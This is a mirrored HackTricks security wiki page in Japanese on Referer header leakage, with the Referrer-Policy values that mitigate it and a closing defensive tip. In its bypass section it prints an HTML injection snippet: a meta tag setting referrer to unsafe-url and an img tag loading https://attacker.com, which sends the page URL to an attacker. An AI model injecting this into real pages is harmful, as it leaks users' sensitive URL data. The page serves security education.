mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
2.6 KiB
2.6 KiB
{% hint style="success" %}
AWSハッキングの学習と練習:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングの学習と練習: HackTricks Training GCP Red Team Expert (GRTE)
HackTricksのサポート
- サブスクリプションプランをチェックしてください!
- 💬 Discordグループに参加するか、telegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksとHackTricks CloudのgithubリポジトリにPRを提出することで、ハッキングテクニックを共有してください。
リファラーヘッダーとポリシー
リファラーは、ブラウザが前のページを示すために使用するヘッダーです。
漏洩した機密情報
Webページ内のGETリクエストパラメータに機密情報が含まれている場合、ページに外部ソースへのリンクが含まれている場合、または攻撃者がユーザーに攻撃者が制御するURLを訪れるようにする/提案する(ソーシャルエンジニアリング)ことができる場合、最新のGETリクエスト内に機密情報を外部に送信できる可能性があります。
緩和策
ブラウザにReferrer-policyに従わせることで、機密情報が他のWebアプリケーションに送信されるのを回避できます。
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
対策のカウンター
このルールをオーバーライドするには、HTMLメタタグを使用できます(攻撃者はHTMLインジェクションを悪用する必要があります):
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
防御
URLのGETパラメータやパスには、機密データを絶対に入れないでください。